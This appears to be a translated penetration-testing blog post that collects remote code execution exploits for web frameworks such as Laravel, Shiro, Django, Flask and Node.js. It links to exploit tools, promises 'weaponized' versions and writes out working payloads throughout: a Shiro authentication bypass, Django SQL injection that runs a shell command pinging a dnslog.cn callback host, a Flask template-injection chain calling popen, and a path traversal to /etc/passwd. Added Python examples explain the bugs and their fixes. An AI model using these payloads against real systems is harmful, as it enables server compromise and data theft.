Preface
Why jump to the topic of framework security all of a sudden? With the current level of security awareness most frameworks get upgraded, or fixed promptly after a notification, so a direct framework RCE is about as rare as it gets; yet, unexpectedly, exactly such an asset turned up in my hands.
This article mainly shares and summarizes common framework RCE techniques, plus a few one-click scripts. Those who came before planted the trees and those who come after enjoy the shade; being a script kiddie is still pretty fun, isn't it?
The article will be kept up to date, like a repository, so fellow researchers can look things up quickly.
No more chatter, let's get straight to it (manual dog head).
Basics
Middleware and framework list:
IIS, Apache, Nginx, Tomcat, Docker, K8s, Weblogic, JBoss, WebSphere, Jenkins, GlassFish, Jetty, Jira, Struts2, Laravel, Solr, Shiro, ThinkPHP, Spring, Flask, jQuery, etc.
1. Development frameworks - PHP - Laravel, ThinkPHP
2. Development frameworks - Java web - Struts2, Spring
3. Development frameworks - Python - Django, Flask
4. Development frameworks - JavaScript - Node.js, jQuery
5. Other frameworks - Java - Apache Shiro & Apache Solr
Common development frameworks by language:
PHP: ThinkPHP, Laravel, Yii, CodeIgniter, CakePHP, Zend, etc.
Java: Spring, MyBatis, Hibernate, Struts2, Spring Boot, etc.
Python: Django, Flask, Bottle, TurboGears, Tornado, Web2py, etc.
JavaScript: Vue.js, Node.js, Bootstrap, jQuery, Angular, etc.
PHP ThinkPHP & Laravel
Laravel
CVE-2021-3129 RCE
Laravel <= 8.4.2 (only exploitable with APP_DEBUG=true; the bug is in the bundled Ignition error page, facade/ignition < 2.5.2)
https://github.com/zhzyker/CVE-2021-3129
https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
ThinkPHP 3.x RCE / 5.x RCE
ThinkPHP is an open-source, lightweight PHP web application development framework.
ThinkPHP dedicated scanners:
https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
https://github.com/Lotus6/ThinkphpGUI/releases/tag/1.3
PHPUnit
eval-stdin.php remote code execution, CVE-2017-9841 (PHPUnit < 4.8.28 and 5.x < 5.6.3)
The script evaluates the raw POST body as PHP. It is only reachable when the vendor/ directory is served by the web server, so the check is simply whether the path below answers. The PHP code goes in the request body, which is omitted in the request shown here.
/phpunit/src/Util/PHP/eval-stdin.php
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host:
Content-Length: 21
Accept-Encoding: gzip
Java Spring & Struts2 & Shiro
Struts2
Arsenal - Struts2 dedicated scanner
Download link at the end of the article
S2-062 CVE-2021-31805 (OGNL injection, Struts 2.0.0 to 2.5.29, fixed in 2.5.30)
https://github.com/YanMu2020/s2-062
Spring
Spring Boot vulnerability learning material, exploitation methods and tricks collection
https://github.com/LandGrey/SpringBootVulExploit
Spring Boot
https://github.com/0x727/SpringBootExploit
https://github.com/WhiteHSBG/JNDIExploit
Spring Cloud Function (SpEL RCE)
https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE
Spring Cloud Gateway (CVE-2022-22947)
https://github.com/An0th3r/CVE-2022-22947-exp
Apache Shiro
Fingerprint: usually visible at the login endpoint. When the request carries a rememberMe cookie (or the login fails), the response's Set-Cookie header contains rememberMe=deleteMe.
Vulnerabilities: https://avd.aliyun.com/search?q=shiro
Apache Shiro <= 1.2.4 default key leads to command execution (Shiro-550), CVE-2016-4437
Apache Shiro < 1.3.2 authentication bypass, CVE-2016-6802
Apache Shiro < 1.4.2 cookie padding oracle (Shiro-721), CVE-2019-12422
Apache Shiro < 1.5.2 authentication bypass, CVE-2020-1957
Apache Shiro < 1.5.3 authentication bypass, CVE-2020-11989
Apache Shiro < 1.6.0 authentication bypass, CVE-2020-13933
Apache Shiro < 1.7.1 authorization bypass, CVE-2020-17523
Shiro-550 (CVE-2016-4437) + Shiro-721 (CVE-2019-12422)
CVE-2020-17523
PoC:
/admin/%20
Affected: Apache Shiro < 1.7.1
https://github.com/jweny/shiro-cve-2020-17523
CVE-2020-1957
PoC:
/xxx/..;/admin/
Affected: Apache Shiro < 1.5.2
Weaponized version: download link at the end of the article.
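Why the /xxx/..;/admin/ PoC works comes down to Shiro and the servlet container disagreeing about what the request path is. The following is an added example, written for this article and not taken from Shiro, the linked PoCs, or any real container code: it is a deliberately simplified model of both sides. The filter chain, the patterns and the URIs are constructed for the illustration; the "legacy" function stands for Shiro < 1.5.2, which matched the decoded request URI as-is, while the "container" function stands for Tomcat/Spring, which strip ;-path parameters from each segment and collapse ".." before routing.

```python
from urllib.parse import unquote
import posixpath

# Constructed filter chain in shiro.ini order: the first matching pattern wins.
FILTER_CHAIN = [
    ("/login", "anon"),
    ("/admin/**", "authc"),
    ("/**", "anon"),
]


def ant_match(pattern: str, path: str) -> bool:
    """Minimal Ant-style matcher: exact patterns plus a trailing '/**'."""
    if pattern.endswith("/**"):
        base = pattern[:-3]
        return path == base or path.startswith(base + "/")
    return pattern == path


def resolve_filter(path: str) -> str:
    """Walk the chain the way PathMatchingFilterChainResolver does (simplified)."""
    for pattern, filt in FILTER_CHAIN:
        if ant_match(pattern, path):
            return filt
    return "anon"


def shiro_legacy_path(raw_uri: str) -> str:
    """Shiro < 1.5.2 (simplified model): the decoded request URI is matched as-is.
    ';' path parameters stay in the string and '..' is never collapsed."""
    return unquote(raw_uri)


def container_path(raw_uri: str) -> str:
    """What the servlet container / Spring actually routes (simplified model):
    drop ';param' from every segment, URL-decode, collapse '.' and '..'."""
    stripped = "/".join(seg.split(";", 1)[0] for seg in raw_uri.split("/"))
    decoded = unquote(stripped)
    path = posixpath.normpath(decoded)
    if decoded.endswith("/") and path != "/":
        path += "/"  # normpath strips the trailing slash; keep it for matching
    return path


def shiro_fixed_path(raw_uri: str) -> str:
    """Post-fix behaviour: normalize the same way the container does before
    consulting the filter chain, so both sides see a single path."""
    return container_path(raw_uri)


def decide(raw_uri: str) -> dict:
    """Compare where the request is routed with which filter each Shiro version applies."""
    return {
        "routed_to": container_path(raw_uri),
        "legacy_filter": resolve_filter(shiro_legacy_path(raw_uri)),
        "fixed_filter": resolve_filter(shiro_fixed_path(raw_uri)),
    }


if __name__ == "__main__":
    for uri in ("/admin/", "/xxx/..;/admin/", "/login"):
        print(uri, decide(uri))
```

For /xxx/..;/admin/ the legacy model returns "anon" because the unnormalized string never matches /admin/**, while the container still dispatches the request to /admin/; the fixed model applies "authc" to the same request. The same pattern (two components canonicalizing the path differently) is what to look for in any front-end authorization filter, not just Shiro.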
Apache Solr
Apache Solr Exploits 🌟
https://github.com/Imanfeng/Apache-Solr-RCE#cve-2017-12629
CVE-2019-0193
CVE-2019-0192
CVE-2019-17558
CVE-2017-12629
CVE-2019-12409
CVE-2020-13957
CVE-2018-8026
CVE-2021-27905 Apache Solr file read & SSRF
https://github.com/murataydemir/CVE-2021-27905
Python Django & Flask & MotionEye
Django
CVE-2019-14234 (JSONField/HStoreField key lookup SQL injection on PostgreSQL; Django 1.11 < 1.11.23, 2.1 < 2.1.11, 2.2 < 2.2.4)
A single quote is injected successfully and the SQL statement errors:
/admin/vuln/collection/?detail__a%27b=123
Create the cmd_exec table (stacked query):
/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20
Run a command through cmd_exec (COPY ... FROM PROGRAM needs a PostgreSQL superuser, or the pg_execute_server_program role on 11+):
/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping hqrwsz.dnslog.cn%27--%20
CVE-2020-7471 (StringAgg delimiter SQL injection on PostgreSQL; Django 1.11 < 1.11.28, 2.2 < 2.2.10, 3.0 < 3.0.3)
https://github.com/huzaifakhan771/CVE-2020-7471-Django
CVE-2021-35042 (QuerySet.order_by SQL injection; Django 3.1 < 3.1.13, 3.2 < 3.2.5; the payloads below are MySQL error-based injection through updatexml)
Base directory:
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@basedir)),1)%23
Version:
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20version())),1)%23
Database name:
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20database())),1)%23
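The reason the order parameter above is injectable is that the vulnerable versions let a value containing a dot through as a raw "table.column" reference without validating it. The block below is an added example written for this article; it is not Django's code and not the patch. It models that check in a few lines, puts a plain allow-list beside it, and decodes the page's own PoC URL to show which string reaches the query. The table name vuln_collection and the allowed field names are constructed, and the "SELECT ... ORDER BY (...)" shape is an assumed illustration of the generated SQL, not Django's exact output.

```python
import re
from urllib.parse import unquote

# Constructed: the columns this endpoint is allowed to order by.
ALLOWED_ORDER_FIELDS = {"id", "name", "created"}

# The page's PoC URL (base directory variant), decoded by order_param() below.
POC_URL = ("/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,"
           "(select%20@@basedir)),1)%23")


def order_param(url: str) -> str:
    """Extract the raw 'order' value. The query string is split by hand so the
    ';' inside the payload is never treated as a parameter separator."""
    return unquote(url.split("order=", 1)[1])


def legacy_is_valid(item: str) -> bool:
    """Simplified model of the pre-fix check: a value containing '.' was taken
    to be a 'table.column' reference and skipped validation entirely."""
    if "." in item:
        return True
    return item.lstrip("-") in ALLOWED_ORDER_FIELDS


def hardened_is_valid(item: str) -> bool:
    """Allow-list: an optional leading '-' followed by an exact known field name."""
    m = re.fullmatch(r"-?([A-Za-z_]\w*)", item)
    return bool(m) and m.group(1) in ALLOWED_ORDER_FIELDS


def build_query(item: str, is_valid) -> str:
    """Assumed shape of the generated SQL: whatever passes the check is
    concatenated raw into ORDER BY, which is exactly the injection point."""
    if not is_valid(item):
        raise ValueError(f"order_by value rejected: {item!r}")
    return f"SELECT * FROM vuln_collection ORDER BY ({item})"


if __name__ == "__main__":
    payload = order_param(POC_URL)
    print("decoded order value:", payload)
    print("legacy accepts it :", legacy_is_valid(payload))
    print("hardened accepts it:", hardened_is_valid(payload))
    print(build_query(payload, legacy_is_valid))
```

With the legacy check the decoded value "vuln_collection.name);select updatexml(...)#" is accepted and lands in the SQL as a stacked statement; with the allow-list it is rejected before any SQL is built. The practical rule this demonstrates: never pass request input straight into order_by(); map it through a dictionary of permitted field names.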
Flask Jinja2 SSTI
Flask is a lightweight web application framework written in Python; its WSGI toolkit is Werkzeug and its template engine is Jinja2. The injection arises when user input is concatenated into the template source (for example render_template_string("Hello " + name)) instead of being passed in as a template variable.
URL-encoded payload (in the name parameter):
?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D
Decoded, the template walks the subclasses of object until it reaches warnings.catch_warnings, pulls the builtins dict out of that class's module globals and calls eval from it:
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
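To see why that gadget chain resolves at all, the same walk can be replayed in plain Python without Jinja2. This is an added example for this article, not code from Flask, Jinja2 or the payload's author; it needs nothing beyond the standard library. The loop mirrors the template line by line: [].__class__.__base__ is object, its __subclasses__() contains every class loaded in the process (warnings.catch_warnings among them, since warnings is always imported), and the __globals__ of a module-level method is that module's namespace, whose __builtins__ entry is the builtins dict in any imported module. The expression evaluated at the end is a harmless constructed one rather than the payload's popen("id").

```python
import builtins
import warnings  # the payload relies on this module already being loaded; make it explicit


def find_eval_like_the_payload():
    """Replay the template's control flow: walk object's subclasses, stop at
    warnings.catch_warnings, and look through the module globals reachable from
    its __init__ for a dict that has an 'eval' key (the builtins dict)."""
    for c in [].__class__.__base__.__subclasses__():
        if c.__name__ == "catch_warnings":
            for b in c.__init__.__globals__.values():
                if b.__class__ == {}.__class__ and "eval" in b.keys():
                    return b["eval"]
    return None


def run_like_the_payload(expression: str):
    """Evaluate an expression through the callable the gadget chain recovers."""
    ev = find_eval_like_the_payload()
    if ev is None:
        raise RuntimeError("gadget chain did not resolve")
    return ev(expression)


def gadget_index() -> int:
    """Position of catch_warnings in object.__subclasses__(); varies per interpreter,
    which is why the payload searches by name instead of hard-coding an index."""
    for i, c in enumerate([].__class__.__base__.__subclasses__()):
        if c.__name__ == "catch_warnings":
            return i
    return -1


if __name__ == "__main__":
    print("catch_warnings index:", gadget_index())
    print("recovered callable   :", find_eval_like_the_payload())
    print("evaluated            :", run_like_the_payload("__import__('os').getcwd()"))
```

The recovered callable is the real builtin eval, so anything the process can do, the template can do. On the Flask side the fix is not to filter these names but to keep user input out of the template source: render_template_string("Hello {{ name }}", name=name) passes the value as data, and jinja2.sandbox.SandboxedEnvironment additionally blocks attribute access of this kind for templates that must stay user-editable.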
MotionEye
Information disclosure, CVE-2022-25568
MotionEye <= 0.42.1 (the endpoint returns the camera configuration, which includes stored credentials)
/config/list
JavaScript jQuery & Node
jQuery
Arbitrary file upload in jQuery Upload File <= 4.0.2 ("url" is the plugin's upload handler endpoint):
curl -F "myfile=@php.php" "url"
XSS payloads
https://github.com/mahp/jQuery-with-XSS
Node.js
CVE-2021-21315
systeminformation < 5.3.1 (command injection: caller-supplied service names reach a shell command, and passing them as an array, which is what name[] produces, sidestepped the string sanitization of older versions)
https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
PoC
/api/getServices?name[]=$(echo -e 'ckcsec' > test.txt)
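The sink behind that PoC is a service name interpolated into a shell command line. The block below is an added example for this article, not code from systeminformation or the PoC repository, and it is in Python rather than Node so it runs alongside the other examples here: one function reproduces the bug pattern with the shell doing $(...) expansion, and two show the fixes (an allow-list for the name, and argv-style execution or shlex.quote when a shell string is unavoidable). It assumes a POSIX sh and echo on PATH; "echo service:" stands in for the real service-status command.

```python
import re
import shlex
import subprocess

# Allow-list for systemd/init service names: letters, digits and a few separators.
SERVICE_NAME_RE = re.compile(r"^[A-Za-z0-9_.@-]+$")


def _run(argv):
    return subprocess.run(argv, capture_output=True, text=True).stdout.strip()


def vulnerable_lookup(name: str) -> str:
    """Bug pattern: the attacker-controlled value is spliced into a command string
    that is handed to sh -c, so $(...), backticks and ';' are interpreted."""
    return _run(["sh", "-c", f"echo service: {name}"])


def hardened_lookup(name: str) -> str:
    """Fix: validate the name against the allow-list, then execute with an argv
    list and no shell, so the value is a single literal argument."""
    if not SERVICE_NAME_RE.match(name):
        raise ValueError(f"invalid service name: {name!r}")
    return _run(["echo", "service:", name])


def quoted_lookup(name: str) -> str:
    """If a shell string cannot be avoided, shlex.quote makes the value literal;
    the $(...) survives as text instead of being executed."""
    return _run(["sh", "-c", f"echo service: {shlex.quote(name)}"])


if __name__ == "__main__":
    injected = "$(echo pwned)"
    print("vulnerable:", vulnerable_lookup(injected))
    print("quoted    :", quoted_lookup(injected))
    print("hardened  :", hardened_lookup("sshd"))
```

The vulnerable variant prints "service: pwned" because the shell expanded the substitution; the quoted variant prints the payload back verbatim, and the hardened variant never lets it reach a process at all. When reviewing Node code the equivalent split is child_process.exec (shell string) versus execFile/spawn with an argument array.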
CVE-2017-14849 (Node.js 8.5.0 path traversal: a change to ".." handling in path normalization broke the path checks of modules such as express static; fixed in 8.6.0)
GET:
/static/../../../a/../../../../etc/passwd
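A static-file handler survives this class of payload only if it normalizes the path before checking it and then verifies the result is still under the document root. The block below is an added example written for this article, not the code of Node, express or any linked tool, and it is in Python like the other examples here; the document root /srv/app/public and the second test path are constructed, the traversal path is the one from the page. The naive resolver shows the mistake of prefix-checking the unnormalized string; the safe one normalizes first and uses commonpath.

```python
import posixpath
from urllib.parse import unquote

STATIC_PREFIX = "/static/"
ROOT = "/srv/app/public"                                # constructed document root
POC = "/static/../../../a/../../../../etc/passwd"       # traversal path from the page


def requested_relative(request_path: str):
    """Strip the mount prefix and URL-decode the remainder (None if not under /static/)."""
    if not request_path.startswith(STATIC_PREFIX):
        return None
    return unquote(request_path[len(STATIC_PREFIX):])


def naive_resolve(root: str, request_path: str):
    """Bug pattern: a prefix check on the *unnormalized* string. It passes for the
    PoC because the joined string still starts with the root; the filesystem then
    resolves every '..' and opens a file far outside it."""
    rel = requested_relative(request_path)
    if rel is None:
        return None
    full = root + "/" + rel
    return full if full.startswith(root + "/") else None


def safe_resolve(root: str, request_path: str):
    """Normalize first, then require the result to stay inside root. An absolute
    'rel' replaces the root in join() and is caught by the same commonpath test.
    On a real server, apply os.path.realpath to both sides as well to defeat symlinks."""
    rel = requested_relative(request_path)
    if rel is None:
        return None
    full = posixpath.normpath(posixpath.join(root, rel))
    if posixpath.commonpath([root, full]) != root:
        return None
    return full


if __name__ == "__main__":
    print("naive :", naive_resolve(ROOT, POC), "->", posixpath.normpath(naive_resolve(ROOT, POC)))
    print("safe  :", safe_resolve(ROOT, POC))
    print("legit :", safe_resolve(ROOT, "/static/css/app.css"))
```

The naive resolver accepts the PoC and the path it hands to the filesystem normalizes to /etc/passwd; the safe resolver rejects it and still serves /static/css/app.css. The Node bug on this page was the opposite failure (the normalization itself was wrong), which is why a final "is the resolved path inside root" check is worth keeping even when the framework is supposed to have done the work.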